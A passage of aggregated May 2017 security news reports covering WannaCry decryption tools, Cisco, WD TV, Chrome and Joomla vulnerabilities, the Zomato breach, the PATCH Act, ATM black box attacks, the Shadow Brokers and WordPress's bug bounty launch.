Anyone who has been infected by WannaCry should avoid restarting their XP computers to try to decrypt the files, the researcher is now working to extend the results of his discovery to other OSs.


WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom
19.5.2017 Securityaffairs Ransomware

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.
Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.
WannaCry Ransomware Decryption Keys
The WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers, a "public" key and a "private" key for encrypting and decrypting the system’s files respectively.
To prevent the victim from accessing the private key and decrypting locked files himself, WannaCry erases the key from the system, leaving no choice for the victims to retrieve the decryption key except paying the ransom to the attacker.
But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.
Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve the two prime numbers, used in the formula to generate encryption keys from memory.
However, this method comes with some limitations and will work only if:
The affected computer has not been rebooted after being infected.
The associated memory has not been allocated and erased by some other process.
"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.
While WannaKey only pulls prime numbers from the memory of the affected computer, the tool can only be used by those who can use those prime numbers to generate the decryption key manually to decrypt their WannaCry-infected PC’s files.
WanaKiwi: WannaCry Ransomware Decryption Tool

 

Good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.
All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd).
WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.
Although the tool won't work for every user due to its dependencies, still it gives some hope to WannaCry's victims of getting their locked files back for free even from Windows XP, the aging, largely unsupported version of Microsoft's operating system.


Cisco Fixes Severe Flaws in Prime Collaboration Product

19.5.2017 securityweek Vulnerebility
Cisco has released updates for its Prime Collaboration Provisioning software to address critical and high severity vulnerabilities that can be exploited remotely without authentication.

The flaws were reported to Cisco by Andrea Micalizzi (aka rgod) through Trend Micro’s Zero Day Initiative (ZDI). Micalizzi, one of ZDI’s top contributors, was credited on Wednesday by the networking giant for finding a total of five vulnerabilities in its Prime Collaboration Provisioning product, which provides a web-based interface for managing Cisco communication services.

The most serious of the flaws, rated critical and tracked as CVE-2017-6622, allows a remote, unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

“The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application,” Cisco said in its advisory.

Micalizzi also discovered a high severity information disclosure vulnerability (CVE-2017-6621) in the Prime Collaboration Provisioning software. The weakness can be exploited by a remote attacker, via specially crafted HTTP requests, to obtain information that can be useful in the reconnaissance phase of an attack.

Users have been advised to update the software to versions 11.6 and 12.1 or later to address these vulnerabilities.

Cisco has also published advisories describing medium severity directory traversal vulnerabilities found by the researcher in the Prime Collaboration Provisioning software. These bugs can be leveraged to view and delete files from the system, but they are considered less severe as they can only be exploited by an authenticated attacker.

Cisco said there was no evidence that any of these flaws had been exploited in the wild.

Cisco published nearly two dozen advisories on Wednesday, but most of them cover medium severity issues. There are only two other advisories describing high severity flaws, including a directory traversal that allows a remote attacker to read files from the Cisco TelePresence IX5000 Series filesystem.

A privilege escalation vulnerability in the Cisco Policy Suite (CPS) software has also been rated high severity, but it can only be exploited by an authenticated, local attacker.


Researchers Disclose Unpatched WD TV Media Player Flaws

19.5.2017 securityweek Vulnerebility
Researchers have disclosed several potentially serious vulnerabilities affecting the WD TV Media Player from Western Digital. The vendor has been aware of the flaws since January, but patches have yet to be released.

In March, researchers from Securify, SEC Consult and Exploitee.rs disclosed multiple vulnerabilities identified in WD’s My Cloud storage devices. However, the My Cloud devices were not the only WD products analyzed by SEC Consult.

The company published an advisory on Thursday describing a total of eight security holes affecting the WD TV Media Player, a device that allows users to access media content from a computer, USB drive, network storage device or the Internet directly on their TV.WD TV Media Player vulnerabilities

“By combining the vulnerabilities documented in this advisory an attacker can fully compromise a network which has the WDTV Media Player appliance installed by using it as a jump-host to aid in further attacks,” SEC Consult warned in its advisory.

One flaw discovered by experts is an arbitrary file upload issue that can be exploited to upload files to the web server without authentication. They also found a local file inclusion vulnerability that can be leveraged to execute the previously uploaded file. This can lead to remote code execution if the attacker uploads a malicious PHP script.

Researchers also determined that all devices are shipped with the same private key in the firmware, the web server is unnecessarily running with root privileges, the login page (which requires only a password) is not protected against brute-force attacks, and the full path of the web directory is exposed. The product is also affected by a SQL injection flaw which, in the worst case scenario, can be exploited to create a backdoor on the web server.

Some of the vulnerabilities can be exploited directly from the Internet if the device’s interface is configured for Web access. However, since cross-site request forgery (CSRF) protection is missing, an attacker can also exploit the flaws remotely by getting the targeted user to click on a malicious link.

SEC Consult found these flaws in version 1.03.07 of the firmware, but believes earlier versions are likely affected as well. The weaknesses were reported to the vendor in mid-January at the same time as the issues affecting My Cloud storage devices, but they remain unpatched. The security firm said the last firmware update for the WD TV Media Player was released in April 2016.

SEC Consult has made public some technical details, but the company will not release any proof-of-concept (PoC) code until patches become available.

SecurityWeek has reached out to WD for comment, but the company had not responded by time of publication.


Google Chrome Bug Leads to Windows Credential Theft

19.5.2017 securityweek Vulnerebility
An issue with the manner in which Google Chrome and Windows handle specific file types can lead to credential theft even on up-to-date systems, a DefenseCode researcher has discovered.

While previous research on the leak of authentication credentials using Windows’ Server Message Block (SMB) file sharing protocol focused only on attacks involving Internet Explorer and Edge, DefenseCode’s Bosko Stankovic discovered that even the most popular browser out there can be used as an attack vector.

In a paper titled Stealing Windows Credentials Using Google Chrome (PDF), Stankovic explains that the attack abuses Chrome’s default configuration, where the browser automatically downloads files that it deems safe. What’s more, it doesn’t even prompt the user for a download location, but uses the present one instead.

What this means is that the browser could download malicious files that it deems safe and save them to disk without user’s knowledge. While most files would require some sort of user interaction to perform malicious operations on the systems, there are file types that don’t and an attacker could exploit these to compromise even systems with the latest patches installed.

One of these file types, the security researcher says, is Windows Explorer Shell Command File or SCF (.scf). Although not well-known, this file type goes back as far as Windows 98, and was primarily used as a Show Desktop shortcut in Windows 98/ME/NT/2000/XP.

“It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location,” the researcher explains.

The same as with shortcut LNK files, the icon location is automatically resolved when the SCF file is shown in Explorer, and attackers are known to have abused this feature by setting an icon location to a remote SMB server in order to abuse the Windows automatic authentication feature when accessing services like remote file shares.

Ever since Stuxnet, Chrome sanitizes LNK files by forcing a .download extension, but doesn’t do the same when SCF files are involved. Because of that, SCF files can be used to trick Windows into an authentication attempt to a remote SMB server. Only two lines of code are needed to conduct such an attack.

“Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the ‘icon’,” Stankovic notes.

The remote SMB server can be set to capture the victim's username and NTLMv2 password hash for offline cracking, or can relay the connection to an external service that accepts the same kind of authentication in an attempt to impersonate the victim without ever knowing the password.

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files,” the researcher explains.

To successfully exploit this attack vector, an actor would simply need to entice users into accessing a website (the attack works even on fully updated Google Chrome and Windows).

The impact of password theft could be dire on enterprise environments (especially if the attack victim is a privileged user) or for Active Directory domains (corporate, government and other networks), where the password theft could lead to escalating internal network breaches.

On Windows 8/10 machines using a Microsoft Account (MSA) instead of a local account, the attack would result in the compromise of all Microsoft services that are integrated with the MSA Single sign-on (SSO). Password reuse could lead to the compromise of accounts unrelated to MSA as well.

“In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files,” the researcher says.


PATCH Act: A New Bill Designed to Prevent Occurrences Like WannaCrypt

19.5.2017 securityweek Ransomware
Following the worldwide WannaCrypt ransomware attack that leveraged the EternalBlue exploit developed by and stolen from the NSA, Microsoft's chief legal officer called for governments to stop stockpiling 0-day exploits. His arguments are morally appealing but politically difficult.

Now, however, he has partial support from a bi-partisan group of lawmakers: Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas). Schatz announced yesterday that they had introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to establish a Vulnerability Equities Review Board with permanent members including the Secretary of Homeland Security, the Director of the FBI, the Director of National Intelligence, the Director of the CIA, the Director of the NSA, and the Secretary of Commerce -- or in each case the designee thereof.

Its effect, however, will be to seek a compromise between the moral requirement for the government to disclose vulnerabilities (Microsoft's Digital Geneva Convention), and the government's political expediency in stockpiling vulnerabilities for national security and deterrence purposes.

In a statement issued yesterday, Schatz wrote, "Striking the balance between U.S. national security and general cybersecurity is critical, but it's not easy. This bill strikes that balance. Codifying a framework for the relevant agencies to review and disclose vulnerabilities will improve cybersecurity and transparency to the benefit of the public while also ensuring that the federal government has the tools it needs to protect national security."

The bill does not go so far as to mandate the disclosure of all government 0-day exploits to relevant vendors for patching, but instead requires the Vulnerability Equities Review Board to develop a consistent and transparent process for decision-making. It will create new oversight mechanisms to improve transparency and accountability, while enhancing public trust in the process.

It further requires that "The head of each Federal agency shall, upon obtaining information about a vulnerability that is not publicly known, subject such information to the process established."

In this way, the Vulnerability Equities Review Board not only has oversight of all 0-day vulnerabilities held by the government agencies, it also maintains the controls "relating to whether, when, how, to whom, and to what degree information about a vulnerability that is not publicly known should be shared or released by the Federal Government to a non-Federal entity." That is, whether the public interest requires the vendor be able to patch the vulnerability.

The proposal is already receiving wide approval. Frederick Humphries, Microsoft's VP of US government affairs, tweeted, "We agree with the goals of the PATCH Act and look forward to working w-Sens @RonJohnsonWI @SenCoryGardner @brianschatz, Reps @farenthold @tedlieu to help prevent cyberattacks."

Thomas Gann, chief public policy officer at McAfee, commented: "All governments have to balance national security interests with economic interests. In some cases, governments have an interest in using certain vulnerabilities for intelligence gathering purposes to protect their national interests in ways that make it impossible to disclose. That said, we support the effort by Senators Schatz and Johnson to establish an equitable vulnerabilities review process. This will help facilitate the disclosure of previously unknown vulnerabilities. An improved process will help balance security and economic interests while also enhancing trust and transparency."

Megan Stifel, cybersecurity policy director at Public Knowledge, said, "We thank these legislators for leading this effort to foster greater transparency and accountability on the cybersecurity policy challenge of software and hardware vulnerabilities. We welcome this bill and similar efforts to enhance trust in the internet and internet-enabled devices."


Hackers Steal 17 Million Users' Data From Indian Restaurant App Zomato

19.5.2017 securityweek Incindent
India's largest restaurant and food delivery app Zomato announced Thursday that the data of 17 million users had been stolen from its database, including names, email addresses and protected passwords.

The startup said the "hashed" passwords could not be decrypted but recommended users change their login details if they use the same password for other services.

Zomato's chief technology officer Gunjan Patidar said customers' financial information was stored separately from the stolen data and was not compromised by the hack.

"No payment information or credit card data has been stolen/leaked," he said in a statement on Zomato's website, adding they were scanning all possible breaches in their system.

"Your credit card information on Zomato is fully secure, so there's nothing to worry about there."

Those affected had been logged out of the website and app and had their passwords changed "as a precaution", he added.

A report on an online hacker news website carried in local media said the trove of personal data was being auctioned on the dark web for roughly $1,000 by a hacker using an alias.

The hack of the internationally popular e-commerce startup comes on the heels of the "WannaCry" cyberattack, the world's biggest ransomware attack to date.

The culprits demanded payment in virtual currency and threatened to delete files on compromised computers, which numbered in the hundreds of thousands worldwide.

Zomato, which boasts 120 million user visits a month, said it was "plugging any security gaps" and would further enhance its security measures after the database breach.

The company -- a so-called "unicorn" startup because it is valued at more than $1 billion -- was founded in 2008 and it now operates in 23 nations. np/cc/klm


Expert Earns $5,000 for Google Intranet Vulnerability

19.5.2017 securityweek Vulnerebility
A researcher has earned a $5,000 bounty from Google after finding an information disclosure vulnerability in the login page for the tech giant’s intranet system.

Austria-based researcher David Wind was looking for a vulnerable Google service that could earn him a bug bounty when he came across login.corp.google.com, the login page for Google’s intranet, which is dubbed “MOMA.”

The login page is simple, but it does load a random image from static.corp.google.com every time it’s accessed. After unsuccessful attempts to obtain something from this domain, Wind generated a 404 error page by adding a random string to the URL.

Unlike other error pages displayed by Google to users, this one contained a link named “Re-run query with SFFE debug trace,” which pointed to the same URL with the string “?deb=trace” at the end.

The debugging page included various pieces of information, including server name and internal IP, X-FrontEnd (XFE) HTTP requests, service policies, and information related to Cloud Bigtable, Google's NoSQL big data database service.

“The page did not allow any user interaction and I haven’t found anything to ‘go deeper’ into the system so I reported it right away,” Wind said on his blog.

Google awarded the researcher $5,000 for his findings, which is the maximum amount for information leaks affecting highly sensitive applications.

The vulnerability was reported to Google on January 19 and a short-term fix was implemented some days later. The company told Wind that a permanent fix was rolled out on March 16.

The $5,000 reward earned by the researcher is significant compared to what other bug bounty programs pay, but it’s small at Google’s standards, which offers more than $30,000 for remote code execution vulnerabilities.

The company has so far paid out more than $9 million since the launch of its bug bounty program in 2010, including over $3 million last year. The biggest single reward in 2016 was $100,000.


Cyberattacks Prompt Massive Security Spending Surge

19.5.2017 securityweek Cyber
The fight against cyberattacks has sparked exponential growth in global protection spending, with the cyber security market estimated at $120 billion this year, more than 30 times its size just over a decade ago.

But even that massive figure looks set to be dwarfed within a few years, experts said, after ransomware attacks crippled computers worldwide in the past week.

The "global cyber security market was worth $3.5 billion" in 2004, according to a study by Cyber security research firm CyberSecurity Ventures, but in 2017, "we expect it to be worth more than $120 billion".

In the five years ending in 2021, the firm said it expected worldwide spending on cybersecurity products and services "to eclipse $1 trillion".

"It has clearly been a rapidly increasing market for many years, particularly in the last two or three years," said Gerome Billois, a cyber security expert with consulting firm Wavestone.

Much of the growth will be spurred by massive cyber attacks like the so-called "Wannacry" ransomware that struck targets in dozens of countries, ranging from British hospitals to Russian banks.

In what experts called an unprecedented mass cyberattack using ransomware, more than 200,000 computers around the world were hacked beginning Friday using a security flaw in Microsoft's Windows XP operating system, an older version that was no longer given mainstream tech support by the US giant.

The virus spread quickly because the culprits used a digital code believed to have been developed by the US National Security Agency -- and subsequently leaked as part of a document dump, according to the Moscow-based computer security firm Kaspersky Lab.

The attack blocks computers and puts up images on victims' screens demanding payment of $300 (275 euros) in the virtual currency Bitcoin, saying: "Ooops, your files have been encrypted!"

The massive attack has been a boon for cyber security firms, driving up stock prices of some while others, like six-year-old American start-up Crowdstrike, were able to raise $100 million in one day.

- Ransomware: 'key trend' -

High-profiles attacks like WannaCry "drive the market," Ilex International president Laurent Gautier told AFP.

Ransomware attacks represent about 22 percent of all global incidents NTT Security, an information security and risk management firm, handles for clients, said Kai Grunwitz, the firm's senior vice president for central Europe.

That number jumps to 56 percent for financial firms.

"So these types of attacks are certainly one of the key trends" driving up spending on computer security systems and tools, Grunwitz said, but "buying more software or hardware products will not fix the problem -- awareness, procedures and a strategy aligned with the specific risk profile are key."

"Nevertheless, the global security market has grown in terms of revenue, and we see a very strong potential for additional growth in products but even more in consulting and managed security services over the next few years."

A still nascent industry just 12 to 13 years ago, the market gradually expanded because of the "digitisation of companies and countries" and the increasing online attacks which publicised the rising digital threat, Billois said.

"The growing wave of ransomware in 2014 created an enormous source of business for security research firms" because "companies were made aware of their vulnerabilities," said security expert Jerome Saiz.

Companies were slow to realise they needed to protect themselves since "the return on investment is impossible to determine," Saiz said, "and we cannot know which attacks we survived and how much they cost".

For large companies, putting in place an IT security strategy can cost tens of millions of dollars, he added.

Some like French telecoms firm Orange choose to bring the security in-house. The telecoms giant bought cyber security firm Lexsi last year.

To better respond to the threat from the other side, smaller security firms have banded together to create alliances, like the group of French companies who formed Hexatrust in 2014.

Either way, software security companies like US anti-virus firm Symantec are reaping the benefits. The company "doubled" its share price in one year, said chief security strategist Laurent Heslault.

But the threat from ransomware is hardly the only danger on the horizon.

The hacking of interconnected appliances and other internet-connected things, the theft of personal and financial data, and hackers engaging in online political campaigns will all drive the market in the coming years.

The biggest troubles however will not come from an attack but a "skills shortage": "a million cyber security jobs worldwide actually remain unfilled," Heslault said.


EU Authorities Fight Back Against "Black Box" ATM Attacks

19.5.2017 securityweek Attack
Europol has announced that a total of 27 related arrests have been made since the ATM black box threat first emerged in 2015. Eleven arrests have been made in France, four in Estonia, three in the Czech Republic and Norway, and two in The Netherlands, Romania and Spain.

A black box attack is a logical attack against cash dispensers. It requires gaining access to the inner workings of the machine, usually, notes Europol, "by drilling holes or melting."

Once access is achieved, the cash dispenser is disconnected from its core working, and connected instead to the hacker's own electronic device -- the so-called black box. The attacker then simply issues the necessary commands to empty the cash dispenser; an act known as 'jackpotting', which bypasses any need for a card or transaction authorization.

Since a black box attack simply empties the whole machine, rather than attempting to extract available cash from an individual account, a single successful attack can potentially steal hundreds of thousands of Euros.

According to Europol, black box attacks have increased dramatically. It quotes a recent report from the European ATM Security Team (EAST) which reports 58 such attacks in 2016 compared to just 15 in 2015. In reality, however, the majority of attacks fail. Although the attacks increased, the related losses fell by 39% from €0.74 million to €0.45 million.

EAST attributes this fall largely to its own work. "While the rise in ATM black box attacks is a concern," said executive director Lachlan Gunn, "we are pleased to note that many of these attacks were not successful. In 2015, to help the industry counter such attacks, our EAST Expert Group on ATM Fraud (EGAF) worked with Europol to produce a document entitled 'Guidance & recommendations regarding logical attacks on ATMs'."

EAST will be leading a breakout session discussing black box attacks at the third global Financial Crime & Security (FCS) Forum, being held in The Hague on 8th/9th June 2017.

Despite the potential for high value individual attacks, black box attacks are rare in comparison to other ATM-related attacks. "ATM related fraud attacks increased by 26%, up from 18,738 in 2015 to 23,588 in 2016," reports EAST. "This rise was mainly driven by a 147% increase in Transaction Reversal Fraud (up from 5,104 to 12,581 incidents). The downward trend for card skimming http://www.securityweek.com/cybercriminals-developing-biometric-skimmers... continues with 3,315 card skimming incidents reported, down 20% from 4,131 in 2015. This is the lowest number of skimming incidents reported since 2005."

Overall, actual fraud-related ATM losses increased only marginally -- up by 2% from €327 million in 2015 to €332 million in 2016.


Zomato Data breach – Nearly 17 million usernames and hashed passwords stolen
19.5.2017 securityaffairs Incindent

Nearly 17 million Zomato usernames and hashed passwords have been stolen by hackers., the company suspects it is an insider’s job.
Nearly 17 million Zomato usernames and hashed passwords have been stolen by hackers.

Zomato is the Indian largest online restaurant guide, the company confirmed data breach announcing that hackers have stolen accounts details of millions of its users.

“about 17 million user records from our database were stolen. The stolen information has user email addresses and hashed passwords.” reads the data breach notification issued by the company.

The company tried to downplay the incident explaining that hashed password are hard to decrypt.

“We hash passwords with a one-way hashing algorithm, with multiple hashing iterations and individual salt per password. This means your password cannot be easily converted back to plain text. We however, strongly advise you to change your password for any other services where you are using the same password.” continues the statement

The reality is quite different, hackers could easily obtain computational resources to crack the passwords.

Zomato confirmed that hackers did not access financial information of the users that are stored in a separate database that was not involved in the attack.

“Payment related information on Zomato is stored separately from this (stolen) data in a highly secure PCI Data Security Standard (DSS) compliant vault. No payment information or credit card data has been stolen/leaked,” the company claims.

The company suspects that the hack is an insider’s job.

“Our team is actively scanning all possible breach vectors and closing any gaps in our environment. So far, it looks like an internal (human) security breach – some employee’s development account got compromised,” the company said.

According to the HackRead website, data stolen by the hackers are already offered for sale on a darkweb marketplace, the vendor “nclay” is offering the full dump for BTC 0.5587 (USD 1,001.43).

Zomato databreach hacked
Zomato Customers should change their password and stay vigilant on suspicious email, crooks could exploit stolen data to launch a phishing campaign.


Critical SQL Injection CVE-2017-8917 vulnerability patched in Joomla, update it now!
19.5.2017 securityaffairs Vulnerebility

Joomla maintainers released a fix for a critical SQL injection flaw, tracked as CVE-2017-8917, that can be exploited by a remote attacker to hijack websites
On Wednesday Joomla maintainers released a fix for a critical SQL injection vulnerability, tracked as CVE-2017-8917, that can be easily exploited by a remote attacker to obtain sensitive data and hijack websites.

The vulnerability was reported by the Sucuri researcher Marc-Alexandre Montpas, it only affects Joomla 3.7.0 because it’s related to a new component introduced in this version.

“The vulnerability is caused by a new component, com_fields, which was introduced in version 3.7. If you use this version, you are affected and should update as soon as possible. This vulnerable component is publicly accessible, which means this issue can be exploited by any malicious individual visiting your site.” reads the analysis published by Sucuri.

“Given the nature of SQL Injection attacks, there are many ways an attacker could cause harm – examples include leaking password hashes and hijacking a logged-in user’s session (the latter results in a full site compromise if an administrator session is stolen).”

According to Montpas, the vulnerability only affects Joomla 3.7 because it’s related to the new com_fields component introduced in this version. The component borrows views from an admin-side component that has the same name, unfortunately, it is a publicly accessible component, this means that anyone can exploit the CVE-2017-8917 vulnerability without needing a privileged account on the vulnerable website. An attacker can leverage the flaw to inject nested SQL queries via a specially crafted URL.

Joomla users have been advised to update their installations to the version 3.7.1.

Sucuri has published the technical details for the CVE-2017-8917 vulnerability, it is likely that threat actors in the wild will start exploiting it in the next weeks.

“The only administrator view that can be accessed is fields – and this will grab its data from an admin-side model (due to the $config[‘base_path’] trick we discussed earlier). In this case, the vulnerability we discovered was located in the FieldsModelFields model, in ./administrator/components/com_fields/models/fields.php.” reads the analysis. “So in order to exploit this vulnerability, all an attacker has to do is add the proper parameters to the URL in order to inject nested SQL queries.”

Joomla CVE-2017-8917 vulnerability

Massive attacks on Joomla installations are dangerous events, in October 2016 Joomla released the version 3.6.4 to fix two high severity vulnerabilities, CVE-2016-8870, and CVE-2016-8869. A combination of these flaws can be exploited to upload a backdoor and gain complete control of vulnerable Joomla websites.

Experts from the firm Sucuri observed a spike in the number of attacks in less than 24 hours after Joomla released patches the above critical flaws.


Critical SQL Injection Flaw Patched in Joomla

18.5.2017 securityweek Vulnerebility
A Joomla update released on Wednesday patches a critical SQL injection vulnerability that can be easily exploited by a remote attacker to obtain sensitive data and hijack websites.

The flaw, discovered by Sucuri researcher Marc-Alexandre Montpas and tracked as CVE-2017-8917, affects Joomla 3.7.0 and it has been addressed with the release of version 3.7.1. This is the only security issue fixed in the latest version.

According to Montpas, the vulnerability only affects Joomla 3.7 because it’s related to a new component introduced in this version. The component in question is com_fields, which borrows views from an admin-side component that has the same name.

Since com_fields is a public-facing component, anyone can exploit the vulnerability without needing a privileged account on the targeted website. An attacker can leverage the flaw to inject nested SQL queries via a specially crafted URL.

“Given the nature of SQL Injection attacks, there are many ways an attacker could cause harm – examples include leaking password hashes and hijacking a logged-in user’s session (the latter results in a full site compromise if an administrator session is stolen),” Montpas warned in a blog post published on Wednesday.

Joomla users have been advised to update their installations as soon as possible. Joomla developers even issued a pre-release security announcement last week to inform users of the “very important security fix.”

While Sucuri has not released a proof-of-concept (PoC) exploit, it has made public the flaw’s technical details. Given that it’s easy to exploit, it would not be surprising to see attacks leveraging this vulnerability in the next days.

In October 2016, cybercriminals started exploiting a couple of Joomla vulnerabilities in less than 24 hours after they were patched, despite the fact that only limited technical details had been made public. At the time, attackers leveraged the flaws to create rogue user accounts on popular websites.

One year prior, attackers started hacking Joomla websites within hours after the details of a SQL injection vulnerability were disclosed by researchers. A few months later, Joomla developers rushed to patch a zero-day that had been exploited in the wild for at least two days before fixes were released.


People the New Perimeter as Hackers Target Users to Infiltrate Enterprises

18.5.2017 securityweek Hacking
Identity Governance is Key to Improving Security and Compliance

Getting breached is becoming part of doing business. More than half of respondents to a Market Pulse Survey reported that they had suffered two or more breaches during 2016; and 60% expect to be breached in 2017. The average material cost of each breach now stands at more than $4 million.

Identity firm SailPoint commissioned Vanson Bourne to interview 600 senior IT decision-makers at organizations with at least 1,000 employees across Australia, France, Germany, Italy, the United Kingdom and the United States. The key finding is that a lack of visibility into staff actions and access capabilities remains a major problem.

SailPoint was founded in 2005. In 2014, private equity firm Thoma Bravo took a sizeable stake in the company -- thought to be in excess of 'several hundred million'. In February 2017, the Wall Street Journal suggested that SailPoint is currently "laying the groundwork for a possible IPO filing later this year."

While the majority of respondents to the Market Pulse Survey claim to have at least partial visibility into users' access to corporate systems and applications, less than half have full visibility.

Complicating factors continue to be cloud (shadow IT) and mobility (BYOD). Ninety percent of respondents admitted that at least some of their employees procure and use applications without IT or Security oversight or approval. Coupled with the growing use of personal mobile devices, many organizations struggle to know where and by whom their data is being used.

Seventy percent of organizations have embraced BYOD; but less than half have a formal policy around its use for corporate data. The result is a lack of visibility into the whereabouts and indeed content of unstructured data. This exacerbates industry's two biggest problems: hackers' exploitation of identity to effect, maintain and expand their incursions; and compliance.

People are the new perimeter, suggests SailPoint. "But even as it's widespread knowledge that hackers are targeting users as their doorway into the enterprise, employees aren't helping matters with continued poor password hygiene. 37% of respondents," explains the report, "cited password hygiene as a big factor into their organization's overall risk profile -- with employees either sharing passwords across multiple accounts and systems, not regularly updating or changing their password or not adhering to overall password management policies."

Compliance issues are also growing. The European General Data Protection Regulation (GDPR) requires that companies don't simply protect European PII, but know precisely where it is located. The latter is necessary because GDPR gives EU citizens the right to have their PII removed from organizations' systems -- and that cannot be achieved if the organization doesn't know where it is located (for example, in unstructured data located on staff mobile devices or in shadow IT cloud storage systems).

The survey shows that this concern is particularly strong in Europe, even though the Regulation will apply to any business anywhere in the world that does business with the EU. "Specific to European respondents," notes the report, "compliance bubbled to the top for some regions as a key goal and driver behind identity governance programs." Nearly threequarters (73%) of UK respondents, and nearly half of German (42%) and French (49%) respondents cited compliance as a reason for improving identity governance.

"There is a silver lining to our report," commented Kevin Cunningham, SailPoint's president and co-founder. "It's clear that now more than ever before, organizations better understand what -- and where -- their risks are, and that identity management can help address those risks. Identity provides that ability to put the detective and preventive controls in place to address all of these exposure points, while automating many identity-related processes to ensure that only the right people have the right access to applications and data at the right time.

He continued, "By putting identity at the center of security and IT operations, these organizations can move their IT teams out of full-time firefighting mode, freeing them up to focus on enabling the business to move forward, confidently and securely."

According to the survey, identity governance is recognized by 97% of respondents as a key solution to these problems; and 55% cite identity as a top security investment priority for 2017. Other benefits are considered to be enhanced security (72% of respondents), a more automated and efficient organization (71%), and business enablement (65%).


Shadow Brokers Promise More Exploits for Monthly Fee

18.5.2017 securityweek BigBrothers
The hacker group calling itself Shadow Brokers claims to possess even more exploits stolen from the NSA-linked Equation Group, and anyone can have them by paying a monthly “membership” fee.

The Shadow Brokers have been in the news over the past days after unknown threat actors leveraged two of the exploits they leaked to deliver WannaCry ransomware to hundreds of thousands of systems worldwide.

The attackers have used an exploit called EternalBlue, which leverages an SMB vulnerability in Windows, to distribute the ransomware without user interaction. Microsoft patched the flaw in March and over the weekend it made available fixes even for outdated versions of Windows.

Some people blamed Shadow Brokers for the devastating WannaCry attacks, arguing that the ransomware could not have spread so easily without the exploits they leaked. Others believe the existence of the vulnerability would have come to light at some point even without them leaking the exploit.

The Shadow Brokers insist that their main goal is to make money and to demonstrate that they are a “worthy opponent” of the Equation Group.

The hackers claimed Microsoft postponed its February security updates to address the EternalBlue and other Eternal exploits. However, they pointed out that they had waited for 30 days after Microsoft rolled out the fixes before releasing the exploits.

The WannaCry attacks led to Microsoft president and chief legal officer Brad Smith renewing his call for governments to stop stockpiling vulnerabilities and disclose them to affected vendors.

Shadow Brokers, however, claims the NSA and Microsoft are “BFFs,” with contracts of “millions or billions of USD each year.” Their other conspiracy theories include an agreement between the NSA and Microsoft over not patching vulnerabilities until they are publicly disclosed, and Microsoft fixing the recent SMB flaw in secret after the NSA lied about the exploits it had been using.

Shadow Brokers claims to possess much more data and exploits, and in June the group plans on launching a subscription-based “service.”

According to the hackers, people willing to pay a monthly fee will receive exploits for browsers, routers, mobile devices, and Windows (including Windows 10). The offer also includes SWIFT network data and information on Russian, Chinese, Iranian and North Korean nuclear and missile programs.

Judging by the group’s previous offers to sell the data for thousands and even tens of thousands of bitcoins, the membership fee will likely not be small.

However, if someone offers to buy the remaining exploits and data from the Shadow Brokers, the group said it will go dark permanently as it will no longer have any financial incentive to continue taking risks.

In January, after failed attempts to make money via auctions, crowdfunding and direct sales, Shadow Brokers announced that it was retiring. With the renewed interest in the exploits it possesses, the group has apparently come up with yet another strategy for making a profit.


WordPress Launches Public Bug Bounty Program

18.5.2017 securityweek Safety
The WordPress security team announced this week the launch of a public bug bounty program that covers the WordPress content management system (CMS) and several related assets.

WordPress has been running a private bug bounty program for roughly seven months and it has now decided to make it public.

The program is hosted on the HackerOne platform and it covers the WordPress CMS and other open-source projects, including BuddyPress, bbPress and GlotPress. Researchers can also report flaws discovered in the WordPress.org (including subdomains), WordCamp.org, BuddyPress.org, WordPress.tv, bbPress.org and Jobs.WordPress.net websites.

White hat hackers have been advised to submit vulnerability reports that include detailed information on the flaw and proof-of-concept (PoC) code. Participants have also been asked to avoid privacy violations and causing damage to live WordPress sites, and give developers a reasonable amount of time to address security holes before their details are made public.

The list of vulnerabilities that experts can report includes cross-site scripting (XSS), cross-site request forgery (CSRF), server-side request forgery (SSRF), remote code execution and SQL injection.

The bug bounty program does not cover vulnerabilities affecting plugins – these should be reported to the app’s developer, but the WordPress plugins team should be alerted as well.

While exceptions may exist, the WordPress security team says it’s typically not interested in basic information disclosure issues, mixed content warnings, lack of HTTP security headers, brute force attacks, XSS flaws that can only be exploited by users with elevated privileges, and reports generated by automated scans.

The WordPress security team has not provided any information on rewards, but it did say that seven researchers have so far earned more than $3,700, which indicates an average of roughly $500 per vulnerability report. The bounties will be paid out by Automattic, the company behind WordPress.com, which runs its own bug bounty program on HackerOne.

According to WordPress developers, the CMS currently powers more than a quarter of the top ten million websites on the Internet. Given the platform’s popularity, it’s no surprise that researchers often find security holes, including serious vulnerabilities that end up being exploited to hack thousands of websites.

